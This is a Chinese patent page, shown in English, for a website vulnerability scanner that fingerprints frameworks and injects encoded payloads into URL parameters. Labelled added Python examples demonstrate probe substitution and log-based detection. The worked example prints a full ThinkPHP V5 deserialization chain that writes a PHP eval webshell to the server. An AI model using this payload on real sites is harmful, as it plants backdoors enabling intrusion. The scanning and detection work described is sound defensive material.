CN113312633A - Website vulnerability scanning method, device, equipment and storage medium - Google Patents

Publication number: CN113312633A
Authority: CN (China)
Prior art keywords: target, website, link address, vulnerability, frame
Legal status: Pending
Application number: CN202110713874.1A
Other languages: Chinese (zh)
Inventor: 郑天时
Current Assignee: Sangfor Technologies Co Ltd
Original Assignee: Sangfor Technologies Co Ltd

Classifications

    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/57 Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
    • G06F21/577 Assessing vulnerabilities and evaluating computer system security
    • G06F16/00 Information retrieval; Database structures therefor; File system structures therefor
    • G06F16/90 Details of database functions independent of the retrieved data types
    • G06F16/95 Retrieval from the web
    • G06F16/951 Indexing; Web crawling techniques

Abstract

The application discloses a website vulnerability scanning method comprising the following steps: crawling the link addresses in a target website; identifying the target development framework of the target website and the target framework version of that framework; generating an available attack load (payload) corresponding to a vulnerability of the target framework version; updating the key-value pairs in each link address with the available attack load; and determining whether the target website has a vulnerability according to whether the execution effect of each updated link address matches the expected effect. With this technical scheme, whether the target website has a vulnerability can be determined accurately, which improves the accuracy of the scan result and reduces the false alarm rate, so that a user can repair the target website based on an accurate scan result and keep it operating securely. The application also discloses a website vulnerability scanning apparatus, device and storage medium with corresponding technical effects.

Description

Website vulnerability scanning method, device, equipment and storage medium
Technical Field
The present application relates to the field of computer application technologies, and in particular, to a method, an apparatus, a device, and a storage medium for website vulnerability scanning.
Background
With the rapid development of computer and network technology, websites of all kinds keep emerging. They bring convenience to people's work and life, and at the same time website security is receiving more and more attention. If a website has a vulnerability, it may be maliciously intruded upon, which threatens its secure operation, so websites need to be scanned so that any vulnerability is discovered in time.
At present, a commonly used vulnerability scanning method is scanning by version comparison: the components used by a website and their versions are identified first, and then all vulnerabilities of those versions are looked up in a vulnerability library, listed and provided to the user.
Vulnerability scanning performed in this way is prone to false alarms. For example, if a user fixes a vulnerability only by modifying the code of a component used by the website, without updating its version, the version number of the component does not change, and version comparison still reports the vulnerability that has already been fixed.
Disclosure of Invention
The application aims to provide a website vulnerability scanning method, a website vulnerability scanning device, website vulnerability scanning equipment and a website vulnerability scanning storage medium, so that accuracy of website vulnerability scanning results is improved, and false alarm rate is reduced.
In order to solve the technical problem, the application provides the following technical scheme:
a website vulnerability scanning method comprises the following steps:
crawling a link address in a target website;
identifying a target development frame of the target website and a target frame version of the target development frame;
generating an available attack load corresponding to the vulnerability of the target frame version;
updating the key-value pairs in each link address by using the available attack load;
and determining whether the target website has a vulnerability or not according to whether the updated execution effect of each link address is in line with the expectation.
In a specific embodiment of the present application, the generating an available attack load corresponding to a vulnerability of the target framework version includes:
obtaining an original attack load corresponding to the vulnerability of the target frame version;
and coding the original attack load to generate an available attack load matched with the target development framework.
In a specific embodiment of the present application, the identifying a target development framework of the target website and a target framework version of the target development framework includes:
analyzing the webpage source code of the target website and the webpage source code corresponding to each crawled link address, and identifying a target development frame of the target website and a target frame version of the target development frame.
In a specific embodiment of the present application, the identifying a target development framework of the target website and a target framework version of the target development framework includes:
acquiring an error report page of the target website;
and identifying a target development frame of the target website and a target frame version of the target development frame based on the error reporting page.
In a specific embodiment of the present application, the updating the key-value pair in each link address by using the available attack payload includes:
aiming at each crawled link address, carrying out simulated click on the current link address to obtain a key value pair of the current link address;
and replacing the value in the key value pair of the current link address with the available attack load.
In a specific embodiment of the present application, determining whether the target website has a bug according to whether the updated execution effect of each link address meets expectations includes:
and if the execution effect of at least one updated link address is expected, determining that the target website has a vulnerability.
In one embodiment of the present application, the method further includes:
and under the condition that the target website has the vulnerability, storing the evidence, and generating and outputting a scanning result.
A website vulnerability scanning apparatus, comprising:
the link address crawling module is used for crawling a link address in a target website;
the development frame identification module is used for identifying a target development frame of the target website and a target frame version of the target development frame;
the attack load generation module is used for generating an available attack load corresponding to the vulnerability of the target frame version;
the link address updating module is used for updating the key value pair in each link address by using the available attack load;
and the vulnerability scanning module is used for determining whether the target website has a vulnerability or not according to whether the execution effect of each updated link address is in accordance with the expectation or not.
A website vulnerability scanning apparatus, comprising:
a memory for storing a computer program;
and the processor is used for realizing the steps of the website vulnerability scanning method when the computer program is executed.
A computer readable storage medium having a computer program stored thereon, the computer program, when executed by a processor, implementing the steps of any of the above website vulnerability scanning methods.
By applying the technical scheme provided by the embodiment of the application, after crawling the link address in the target website and identifying the target development frame of the target website and the target frame version of the target development frame, the available attack load corresponding to the vulnerability of the target frame version is generated, the key value pair in each link address is updated by using the available attack load, and whether the vulnerability exists in the target website is determined according to whether the execution result of each updated link address meets the expectation or not. The key value pair in each link address in the target website is updated through the available attack load corresponding to the vulnerability of the target frame version of the target development frame of the target website, the updated link address is executed again, whether the vulnerability exists in the target website can be accurately determined according to the fact that whether the execution result meets the expectation, the accuracy of website vulnerability scanning results is improved, the false alarm rate is reduced, a user can repair the target website according to the accurate vulnerability scanning results, and the safe operation of the target website is guaranteed.
Drawings
In order to more clearly illustrate the embodiments of the present application or the technical solutions in the prior art, the drawings used in the description of the embodiments or the prior art will be briefly described below, it is obvious that the drawings in the following description are only some embodiments of the present application, and for those skilled in the art, other drawings can be obtained according to the drawings without creative efforts.
FIG. 1 is a flowchart illustrating an exemplary implementation of a website vulnerability scanning method in an embodiment of the present disclosure;
FIG. 2 is a schematic structural diagram of a website vulnerability scanning apparatus in an embodiment of the present application;
FIG. 3 is a schematic structural diagram of a website vulnerability scanning apparatus in an embodiment of the present application.
Detailed Description
The core of the application is to provide a website vulnerability scanning method. After crawling the link addresses in the target website and identifying the target development frame of the target website and the target frame version of the target development frame, generating available attack loads corresponding to the vulnerabilities of the target frame version, updating the key value pairs in each link address by using the available attack loads, and determining whether the vulnerability exists in the target website according to whether the execution result of each updated link address meets the expectation. The key value pair in each link address in the target website is updated through the available attack load corresponding to the vulnerability of the target frame version of the target development frame of the target website, the updated link address is executed again, whether the vulnerability exists in the target website can be accurately determined according to the fact that whether the execution result meets the expectation, the accuracy of website vulnerability scanning results is improved, the false alarm rate is reduced, a user can repair the target website according to the accurate vulnerability scanning results, and the safe operation of the target website is guaranteed.
In order that those skilled in the art will better understand the disclosure, the following detailed description will be given with reference to the accompanying drawings. It is to be understood that the embodiments described are only a few embodiments of the present application and not all embodiments. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present application.
Referring to fig. 1, an implementation flowchart of a website vulnerability scanning method provided in the embodiment of the present application is shown, where the method may include the following steps:
S110: Crawl the link addresses in the target website.
The target website may be any website that requires vulnerability scanning. One or more link addresses, i.e. URLs (Uniform Resource Locators), may exist in the target website.
The link addresses in the target website can be crawled by a crawler. Specifically, the domain name of the target website is obtained first, the target website is accessed through that domain name, and each directory level of the target website is crawled to obtain its link addresses. A crawler can crawl all link addresses in the target website quickly and efficiently, including link addresses that pass parameters.
S120: a target development framework of a target website and a target framework version of the target development framework are identified.
The target website may be developed with a particular development framework, which is present in the target website as a component. A component is the smallest unit of asset inventory. For example, a server asset may include several types of components: browser components such as IE (Internet Explorer, a web browser) and Firefox; web server components such as WebLogic (a middleware based on the Java EE architecture) and IIS (Internet Information Services); and web development framework components such as ThinkPHP (a fast, compatible, simple and lightweight PHP (PHP: Hypertext Preprocessor) development framework), CI (CodeIgniter, a small but powerful PHP framework) and Yii2 (a high-performance web application development framework for PHP 5).
By analyzing the related information of the target website, such as fingerprint information, source code information, error reporting information and the like, the target development frame of the target website and the target frame version of the target development frame can be identified and obtained.
S130: Generate an available attack load corresponding to the vulnerability of the target framework version.
One development framework can have multiple vulnerabilities, and different framework versions of the same development framework can have different vulnerabilities. Through data collection, data analysis and similar means, the vulnerabilities corresponding to each framework version of each development framework can be obtained in advance and recorded in an information base.
After the target development framework of the target website and its target framework version are identified, the vulnerabilities of the target framework version can be obtained by querying the information base, and an available attack load corresponding to each vulnerability is generated. An attack load, i.e. a payload, is mainly used to establish a stable connection between the target machine and the attacking machine and return a shell, and may also perform program injection and the like. The available attack load is the attack load used for fuzz testing the target development framework.
S140: the key-value pairs in each link address are updated with the available attack payload.
One or more link addresses to the target website may be crawled by crawling link addresses in the target website, each link address having a respective key-value pair. The key-value pairs in each link address may be updated with the available attack payload.
S150: Determine whether the target website has a vulnerability according to whether the execution effect of each updated link address matches the expected effect.
The available attack load is the attack load used for fuzz testing the target development framework. After the key-value pairs in each link address are updated with the available attack load, each updated link address can be re-executed. Whether the target website has a vulnerability can then be determined from whether the execution effect of each updated link address matches the expected effect. If it does, the corresponding vulnerability can be used to perform illegal operations on the target website, and the target website is determined to have that vulnerability. If it does not, the corresponding vulnerability cannot be used to perform illegal operations on the target website, and the target website is determined not to have that vulnerability.
Specifically, if at least one updated link address produces the expected execution effect, the target website is determined to have a vulnerability; if no updated link address produces the expected execution effect, the target website has no vulnerability under the target framework version of the current target development framework.
It can be understood that each available attack load corresponds to a vulnerability of the target framework version, and different vulnerabilities correspond to different available attack loads. After the key-value pairs in the link addresses are updated with a given available attack load, if the execution effect of at least one updated link address matches the expected effect, the vulnerability corresponding to that attack load exists in the target website. Because the target website is scanned on the principle of the vulnerability itself (principle scanning), a relatively accurate vulnerability scanning result can be obtained.
By applying the method provided by the embodiment of the application, after crawling the link address in the target website and identifying the target development frame of the target website and the target frame version of the target development frame, the available attack load corresponding to the vulnerability of the target frame version is generated, the key value pair in each link address is updated by using the available attack load, and whether the vulnerability exists in the target website is determined according to whether the execution result of each updated link address meets the expectation or not. The key value pair in each link address in the target website is updated through the available attack load corresponding to the vulnerability of the target frame version of the target development frame of the target website, the updated link address is executed again, whether the vulnerability exists in the target website can be accurately determined according to the fact that whether the execution result meets the expectation, the accuracy of website vulnerability scanning results is improved, the false alarm rate is reduced, a user can repair the target website according to the accurate vulnerability scanning results, and the safe operation of the target website is guaranteed.
In one embodiment of the present application, step S130 may include the steps of:
Step one: obtain the original attack load corresponding to the vulnerability of the target framework version;
Step two: encode the original attack load to generate an available attack load matched with the target development framework.
For convenience of description, the above two steps are combined for illustration.
In this embodiment, in addition to the vulnerabilities corresponding to each framework version of each development framework, the information base can also record the original attack load corresponding to each vulnerability. The original attack load does not necessarily match the target development framework. Therefore, after the original attack load corresponding to the vulnerability of the target framework version is obtained by querying the information base, it can be encoded to generate an available attack load matched with the target development framework, i.e. the attack load used for fuzz testing the target development framework. This supports fuzz testing of the target development framework and improves the accuracy of vulnerability scanning.
In one embodiment of the present application, step S120 may include the steps of:
and analyzing the webpage source code of the target website and the webpage source code corresponding to each crawled link address, and identifying a target development frame of the target website and a target frame version of the target development frame.
In the embodiment of the application, after the link addresses in the target website are crawled, the webpage source code corresponding to each link address can be further obtained, and meanwhile, the webpage source code of the target website can also be obtained. And analyzing the webpage source code of the target website and the webpage source code corresponding to each crawled link address, and identifying a target development frame of the target website and a target frame version of the target development frame according to an analysis result. Through the analysis of the webpage source codes, the target development frame of the target website and the target frame version of the target development frame can be quickly and accurately identified.
In one embodiment of the present application, step S120 may include the steps of:
Step one: acquire an error reporting page of the target website;
Step two: identify the target development framework of the target website and the target framework version of that framework based on the error reporting page.
For convenience of description, the above two steps are combined for illustration.
In the embodiment of the application, when it is determined that vulnerability scanning is to be performed on a target website, an error report page of the target website can be obtained. The error pages of the target website can be collected in advance.
After the error page of the target website is obtained, the error page can be analyzed, and the target development frame of the target website and the target frame version of the target development frame can be quickly identified and obtained.
In one embodiment of the present application, step S140 may include the steps of:
Step one: for each crawled link address, perform a simulated click on the current link address to obtain the key-value pairs of the current link address;
Step two: replace the value in each key-value pair of the current link address with the available attack load.
For convenience of description, the above two steps are combined for illustration.
In the embodiment of the application, after crawling the link address in the target website, identifying the target development frame of the target website and the target frame version of the target development frame, and generating the available attack load corresponding to the vulnerability of the target frame version, the current link address can be clicked in a simulation mode aiming at each crawled link address, and the key value pair of the current link address is obtained. And performing corresponding operation on each crawled link address, wherein the current link address is the link address aimed by the current operation. If two link addresses are crawled together, when the current operation is directed at a first link address, the current link address is the first link address, the first link address is subjected to simulated clicking to obtain a key value pair of the first link address, when the current operation is directed at a second link address, the current link address is the second link address, and the second link address is subjected to simulated clicking to obtain a key value pair of the second link address.
After the key value pair of the current link address is obtained for each crawled link address, the value in the key value pair of the current link address can be replaced by the available attack load, and the current link address is updated. When the updated current link address is re-executed, the execution effect of the updated current link address can be used as a basis for judging whether the target website has a bug.
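The two steps above, as an added example that is not part of the patent: it base64-encodes a probe string (base64 is the encoding the page names in its worked example) and produces one updated link address per key. The probe INERT, the sample links, the function names and the choice to replace one key at a time are assumptions made for illustration.

```python
import base64
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Constructed, inert stand-in for an "original attack load"; it does nothing
# on any server and only marks where a scanner would place its value.
RAW_PROBE = "INERT"


def encode_probe(raw: str) -> str:
    """Encode the raw probe with base64 (assumed encoding step of S130)."""
    return base64.b64encode(raw.encode("utf-8")).decode("ascii")


def key_value_pairs(link: str) -> list:
    """Return the (key, value) pairs in the link's query string, in order."""
    return parse_qsl(urlsplit(link).query, keep_blank_values=True)


def updated_links(link: str, probe: str) -> list:
    """S140: return (key, updated link) pairs, one per key in the link.

    Assumption: one key is replaced per updated link so that a response can
    be attributed to a single parameter; the other pairs keep their values.
    Links without a query string yield no updated links.
    """
    parts = urlsplit(link)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    results = []
    for index, (key, _old) in enumerate(pairs):
        mutated = [(k, probe if i == index else v)
                   for i, (k, v) in enumerate(pairs)]
        # urlencode percent-encodes the probe so "=" padding survives transport.
        query = urlencode(mutated)
        results.append((key, urlunsplit(parts._replace(query=query))))
    return results


if __name__ == "__main__":
    probe = encode_probe(RAW_PROBE)
    # Constructed sample links on localhost.
    for link in ("http://localhost/app/index.php?poc=1",
                 "http://localhost/app/list.php?page=2&sort=name",
                 "http://localhost/app/about.html"):
        print(link, "->", updated_links(link, probe))
```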
In an embodiment of the present application, in the case that it is determined that a target website has a vulnerability, the evidence may be saved, and a scan result may be generated and output. Therefore, the user can timely know whether the target website has the bugs or not according to the scanning result and which type of bugs exist, so that the bugs of the target website can be timely repaired, and the safety of the target website is guaranteed.
For convenience of understanding, the technical solutions provided in the embodiments of the present application are described in detail below by specific examples.
Acquiring a website domain name of a target website, such as localhost/example/think-5.0.24/public/index.
The crawler can also be used to obtain the webpage source code, which is then analyzed to identify the target development framework of the target website and the target framework version of that framework. For example, if the webpage source code of the target website contains <p>ThinkPHP V5<br/>, analysis of this content shows that the target website was developed with ThinkPHP: the target development framework is ThinkPHP and the target framework version is V5.
All vulnerabilities of ThinkPHP V5, and the original attack load corresponding to each vulnerability, can be obtained by querying the pre-established information base. For example, ThinkPHP V5 has a deserialization vulnerability with the original attack load:
O:27:"think\process\pipes\Windows":1:{s:34:"think\process\pipes\Windowsfiles";a:1:{i:0;O:17:"think\model\Pivot":3:{s:9:"*append";a:1:{s:3:"xxx";s:8:"getError";}s:8:"*error";O:27:"think\model\relation\HasOne":3:{s:15:"*selfRelation";i:0;s:11:"*bindAttr";a:1:{i:0;s:3:"xxx";}s:8:"*query";O:14:"think\db\Query":1:{s:8:"*model";O:20:"think\console\Output":2:{s:28:"think\console\Outputhandle";O:30:"think\session\driver\Memcached":1:{s:10:"*handler";O:23:"think\cache\driver\File":2:{s:10:"*options";a:5:{s:6:"expire";i:3600;s:12:"cache_subdir";b:0;s:6:"prefix";s:0:"";s:4:"path";s:122:"php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php";s:13:"data_compress";b:0;}s:6:"*tag";s:3:"xxx";}}s:9:"*styles";a:1:{i:0;s:7:"getAttr";}}}}s:6:"parent";r:11;}}}。
Encoding the original attack load corresponding to each vulnerability of ThinkPHP V5, for example with base64, generates a series of available attack loads matched with the target development framework for simulation testing. The original attack load of the deserialization vulnerability above is encoded in this way to obtain its available attack load.
The crawler obtains link addresses such as https://tajs.qq.com/stats?sId=9347272 and http://localhost/example/think-5.0.24/public/index.php?poc=1, and a simulated click is performed on each link address to obtain its key-value pairs. For example, the key-value pair of the first link address is Key = sId, Value = 9347272, and the key-value pair of the second link address is Key = poc, Value = 1.
The Value in the key-value pair of each parsed link address is replaced with an available attack load, the updated link address is re-executed, and whether the target website has a vulnerability is determined from the execution effect of the updated link address. Each original attack load has a corresponding execution effect. For example, if the execution effect corresponding to a certain original attack load is that a shell file is generated on the server, then after an available attack load is generated from that original attack load and used to update the key-value pair in a link address, the corresponding vulnerability is determined to exist if executing the updated link address results in the corresponding shell file being generated.
When the target website is determined to have a vulnerability, the evidence may be saved, for example by storing a screenshot of the generated file, and the scanning result is then generated and output.
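Seen from the operator of the scanned website, the requests in the specific example above carry a PHP serialized object, plain or base64-encoded, as the value of a query key. The following added example (not part of the patent) inspects access-log lines for that pattern; the log format, addresses, function names and the inert stdClass object are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Header of a PHP serialized object, e.g. O:8:"stdClass":0:{
SERIALIZED_OBJECT = re.compile(r'O:\d+:"[A-Za-z_\\][A-Za-z0-9_\\]*":\d+:\{')
# Client address, request target and status from a combined-format log line.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_candidates(value):
    """Yield (label, text) views of one parameter value to inspect."""
    yield "plain", value
    # Query decoding turns "+" into a space; also accept URL-safe base64.
    b64 = value.replace(" ", "+").replace("-", "+").replace("_", "/")
    if len(b64) < 8:
        return
    try:
        padded = b64 + "=" * (-len(b64) % 4)
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return
    # latin-1 never fails, so NUL bytes in property names are preserved.
    yield "base64", raw.decode("latin-1")


def inspect_line(line):
    """Return findings for every query key whose value holds a PHP object."""
    match = LOG_LINE.match(line)
    if not match:
        return []
    findings = []
    query = urlsplit(match.group("target")).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        for label, text in decode_candidates(value):
            if SERIALIZED_OBJECT.search(text):
                findings.append({
                    "ip": match.group("ip"),
                    "key": key,
                    "encoding": label,
                    "status": int(match.group("status")),
                })
                break
    return findings


def scan(lines):
    """Inspect every log line and return all findings in order."""
    return [finding for line in lines for finding in inspect_line(line)]


# Constructed, inert serialized object and constructed log lines.
_OBJ = 'O:8:"stdClass":0:{}'
_PLAIN = quote(_OBJ, safe="")
_B64 = quote(base64.b64encode(_OBJ.encode("ascii")).decode("ascii"), safe="")
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /index.php?poc=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] '
    '"GET /index.php?poc=' + _PLAIN + ' HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] '
    '"GET /index.php?poc=' + _B64 + ' HTTP/1.1" 500 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] '
    '"GET /index.php?token=aGVsbG8gd29ybGQ= HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding only shows that a serialized object was submitted; whether it had any effect still has to be checked on the server, for example by looking for files created around the time of the request.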
Corresponding to the above method embodiments, the present application further provides a website vulnerability scanning apparatus, and the website vulnerability scanning apparatus described below and the website vulnerability scanning method described above may be referred to in a corresponding manner.
Referring to fig. 2, the apparatus may include the following modules:
a link address crawling module 210, configured to crawl link addresses in a target website;
the development frame identification module 220 is used for identifying a target development frame of a target website and a target frame version of the target development frame;
an attack load generation module 230, configured to generate an available attack load corresponding to a vulnerability of the target framework version;
a link address updating module 240 for updating the key-value pairs in each link address with the available attack payload;
and the vulnerability scanning module 250 is configured to determine whether a vulnerability exists in the target website according to whether the execution effect of each updated link address meets expectations.
By applying the device provided by the embodiment of the application, after crawling the link address in the target website and identifying the target development frame of the target website and the target frame version of the target development frame, the available attack load corresponding to the vulnerability of the target frame version is generated, the key value pair in each link address is updated by using the available attack load, and whether the vulnerability exists in the target website is determined according to whether the execution result of each updated link address meets the expectation or not. The key value pair in each link address in the target website is updated through the available attack load corresponding to the vulnerability of the target frame version of the target development frame of the target website, the updated link address is executed again, whether the vulnerability exists in the target website can be accurately determined according to the fact that whether the execution result meets the expectation, the accuracy of website vulnerability scanning results is improved, the false alarm rate is reduced, a user can repair the target website according to the accurate vulnerability scanning results, and the safe operation of the target website is guaranteed.
In a specific embodiment of the present application, the attack payload generation module 230 is configured to:
obtain an original attack payload corresponding to the vulnerability of the target framework version;
and encode the original attack payload to generate an available attack payload matched with the target development framework.
In one embodiment of the present application, the development framework identification module 220 is configured to:
analyze the webpage source code of the target website and the webpage source code corresponding to each crawled link address, and identify the target development framework of the target website and the target framework version of the target development framework.
In one embodiment of the present application, the development framework identification module 220 is configured to:
acquire an error reporting page of the target website;
and identify the target development framework of the target website and the target framework version of the target development framework based on the error reporting page.
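Identification from an error reporting page, followed by selection of only those checks whose affected range contains the identified version, can be sketched as follows. This is an added example, not code from the patent: the banner patterns are assumptions about what default error pages emit, and the check catalogue, its ids and version ranges, and the sample pages are constructed placeholders.

```python
import re
from typing import List, Optional, Tuple

# Assumed banner patterns (not from the patent): strings that default or
# debug error pages of these frameworks commonly contain.
SIGNATURES = [
    ("Apache Tomcat", re.compile(r"Apache Tomcat/(\d+(?:\.\d+)+)")),
    ("ThinkPHP", re.compile(r"ThinkPHP\s+V(\d+(?:\.\d+)+)")),
    ("Django", re.compile(r"Django Version:\s*(?:<[^>]+>\s*)*(\d+(?:\.\d+)+)")),
]

# Constructed check catalogue: ids and version ranges are placeholders,
# not real advisories. A check applies when first <= version < fixed.
CHECKS = [
    {"id": "PLACEHOLDER-CHECK-A", "framework": "Apache Tomcat",
     "first": "9.0.0", "fixed": "9.0.40"},
    {"id": "PLACEHOLDER-CHECK-B", "framework": "Apache Tomcat",
     "first": "8.5.0", "fixed": "8.5.60"},
    {"id": "PLACEHOLDER-CHECK-C", "framework": "Django",
     "first": "3.2", "fixed": "3.2.5"},
]

def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '9.0.31' into (9, 0, 31) so versions compare numerically."""
    return tuple(int(part) for part in text.split("."))

def identify_framework(error_page: str) -> Optional[Tuple[str, str]]:
    """Return (framework, version) if the error page leaks a known banner."""
    for name, pattern in SIGNATURES:
        match = pattern.search(error_page)
        if match:
            return name, match.group(1)
    return None  # custom error page: nothing to fingerprint

def applicable_checks(error_page: str) -> List[str]:
    """Ids of the checks whose affected range contains the identified version."""
    found = identify_framework(error_page)
    if found is None:
        return []
    name, version = found
    current = parse_version(version)
    return [c["id"] for c in CHECKS
            if c["framework"] == name
            and parse_version(c["first"]) <= current < parse_version(c["fixed"])]

# Constructed sample error pages.
TOMCAT_PAGE = ("<html><body><h1>HTTP Status 404 - Not Found</h1><hr/>"
               "<h3>Apache Tomcat/9.0.31</h3></body></html>")
DJANGO_PAGE = "<tr><th>Django Version:</th>\n<td>3.2.6</td></tr>"
HARDENED_PAGE = "<html><body><h1>Something went wrong</h1></body></html>"
```

A site that serves a custom error page without a version banner yields no match here, which is why the other embodiment falls back to analysing webpage source code.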
In one embodiment of the present application, the link address updating module 240 is configured to:
for each crawled link address, perform a simulated click on the current link address to obtain the key-value pairs of the current link address;
and replace the value in the key-value pair of the current link address with the available attack payload.
In an embodiment of the present application, the vulnerability scanning module 250 is configured to:
determine that the target website has a vulnerability if the execution effect of at least one updated link address meets expectations.
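The link address update and the "at least one updated link address" decision rule can be sketched together as follows. This is an added example, not code from the patent. It assumes the key-value pairs are read from the URL query string rather than obtained by a simulated click, replaces one value per request, uses an inert marker string in place of an attack payload, and takes the fetch function as a parameter so that a constructed responder can stand in for the website.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

MARKER = "probe<7f3a>"  # inert, constructed marker standing in for a payload

def mutate_link(link, payload):
    """Return (key, updated_link) pairs, one per query parameter.

    Assumption: one value is replaced per request so that a finding can be
    attributed to a single parameter. urlencode() percent-encodes the payload.
    """
    parts = urlsplit(link)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    variants = []
    for index, (key, _old_value) in enumerate(pairs):
        mutated = list(pairs)
        mutated[index] = (key, payload)
        updated = urlunsplit(parts._replace(query=urlencode(mutated)))
        variants.append((key, updated))
    return variants

def scan(links, payload, expected, fetch):
    """Request every updated link and keep evidence where the response
    shows the expected effect (here: the expected string is in the body)."""
    evidence = []
    for link in links:
        for key, updated in mutate_link(link, payload):
            body = fetch(updated)
            if expected in body:
                evidence.append({"link": link, "parameter": key,
                                 "request": updated})
    # One matching updated link is enough to report the site as vulnerable.
    return {"vulnerable": bool(evidence), "evidence": evidence}

# Constructed stand-in for the target site: it echoes the "q" parameter
# into the page without escaping and ignores every other parameter.
def fake_fetch(url):
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    return "<p>Results for " + params.get("q", "") + "</p>"

# Constructed sample link addresses.
SAMPLE_LINKS = [
    "https://shop.example/search?q=shoes&page=2",
    "https://shop.example/item?id=7",
    "https://shop.example/about",
]

def run_demo():
    return scan(SAMPLE_LINKS, MARKER, MARKER, fake_fetch)
```

Keeping the parameter name and the exact request in each evidence record is what lets a reviewer reproduce a finding and rule out a false alarm.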
In a specific embodiment of the present application, the apparatus further includes an evidence saving module and a scanning result output module, wherein:
the evidence saving module is configured to save evidence when the target website has a vulnerability;
and the scanning result output module is configured to generate and output a scanning result.
Corresponding to the above method embodiment, an embodiment of the present application further provides a website vulnerability scanning device, including:
a memory for storing a computer program;
and a processor, configured to implement the steps of the above website vulnerability scanning method when executing the computer program.
As shown in fig. 3, which is a schematic view of a composition structure of a website vulnerability scanning apparatus, the website vulnerability scanning apparatus may include: a processor 10, a memory 11, a communication interface 12 and a communication bus 13. The processor 10, the memory 11 and the communication interface 12 all communicate with each other through a communication bus 13.
In the embodiment of the present application, the processor 10 may be a Central Processing Unit (CPU), an application specific integrated circuit, a digital signal processor, a field programmable gate array or other programmable logic device, etc.
The processor 10 may call a program stored in the memory 11, and in particular, the processor 10 may perform operations in an embodiment of the website vulnerability scanning method.
The memory 11 is used for storing one or more programs. A program may include program code, and the program code includes computer operation instructions. In this embodiment, the memory 11 stores at least a program for implementing the following functions:
crawling link addresses in a target website;
identifying a target development framework of the target website and a target framework version of the target development framework;
generating an available attack payload corresponding to a vulnerability of the target framework version;
updating the key-value pairs in each link address with the available attack payload;
and determining whether the target website has a vulnerability according to whether the execution effect of each updated link address meets expectations.
In one possible implementation, the memory 11 may include a program storage area and a data storage area. The program storage area may store an operating system, an application program required by at least one function (such as a web page crawling function and a web page parsing function), and the like; the data storage area may store data created during use, such as link address data and attack payload data.
Further, the memory 11 may include high speed random access memory, and may also include non-volatile memory, such as at least one magnetic disk storage device or other volatile solid state storage device.
The communication interface 12 may be an interface of a communication module for connecting with other devices or systems.
It should be noted that the structure shown in fig. 3 does not constitute a limitation on the website vulnerability scanning apparatus in the embodiment of the present application. In practical applications, the website vulnerability scanning apparatus may include more or fewer components than those shown in fig. 3, or a combination of some components.
Corresponding to the above method embodiments, the present application further provides a computer-readable storage medium, where a computer program is stored on the computer-readable storage medium, and when the computer program is executed by a processor, the steps of the website vulnerability scanning method are implemented.
The embodiments are described in a progressive manner. Each embodiment focuses on its differences from the other embodiments, and for the same or similar parts the embodiments may be referred to one another.
Those of skill would further appreciate that the various illustrative elements and algorithm steps described in connection with the embodiments disclosed herein may be implemented as electronic hardware, computer software, or combinations of both, and that the various illustrative components and steps have been described above generally in terms of their functionality in order to clearly illustrate this interchangeability of hardware and software. Whether such functionality is implemented as hardware or software depends upon the particular application and design constraints imposed on the implementation. Skilled artisans may implement the described functionality in varying ways for each particular application, but such implementation decisions should not be interpreted as causing a departure from the scope of the present application.
The steps of a method or algorithm described in connection with the embodiments disclosed herein may be embodied directly in hardware, in a software module executed by a processor, or in a combination of the two. A software module may reside in Random Access Memory (RAM), memory, Read Only Memory (ROM), electrically programmable ROM, electrically erasable programmable ROM, registers, hard disk, a removable disk, a CD-ROM, or any other form of storage medium known in the art.
The principle and the implementation of the present application are explained in the present application by using specific examples, and the above description of the embodiments is only used to help understanding the technical solution and the core idea of the present application. It should be noted that, for those skilled in the art, it is possible to make several improvements and modifications to the present application without departing from the principle of the present application, and such improvements and modifications also fall within the scope of the claims of the present application.

Claims (10)

1. A website vulnerability scanning method, characterized by comprising:
crawling link addresses in a target website;
identifying a target development framework of the target website and a target framework version of the target development framework;
generating an available attack payload corresponding to a vulnerability of the target framework version;
updating the key-value pairs in each link address with the available attack payload;
and determining whether the target website has a vulnerability according to whether the execution effect of each updated link address meets expectations.
2. The website vulnerability scanning method according to claim 1, wherein the generating of the available attack payload corresponding to the vulnerability of the target framework version comprises:
obtaining an original attack payload corresponding to the vulnerability of the target framework version;
and encoding the original attack payload to generate an available attack payload matched with the target development framework.
3. The website vulnerability scanning method of claim 1, wherein the identifying the target development framework of the target website and the target framework version of the target development framework comprises:
analyzing the webpage source code of the target website and the webpage source code corresponding to each crawled link address, and identifying the target development framework of the target website and the target framework version of the target development framework.
4. The website vulnerability scanning method of claim 1, wherein the identifying the target development framework of the target website and the target framework version of the target development framework comprises:
acquiring an error reporting page of the target website;
and identifying the target development framework of the target website and the target framework version of the target development framework based on the error reporting page.
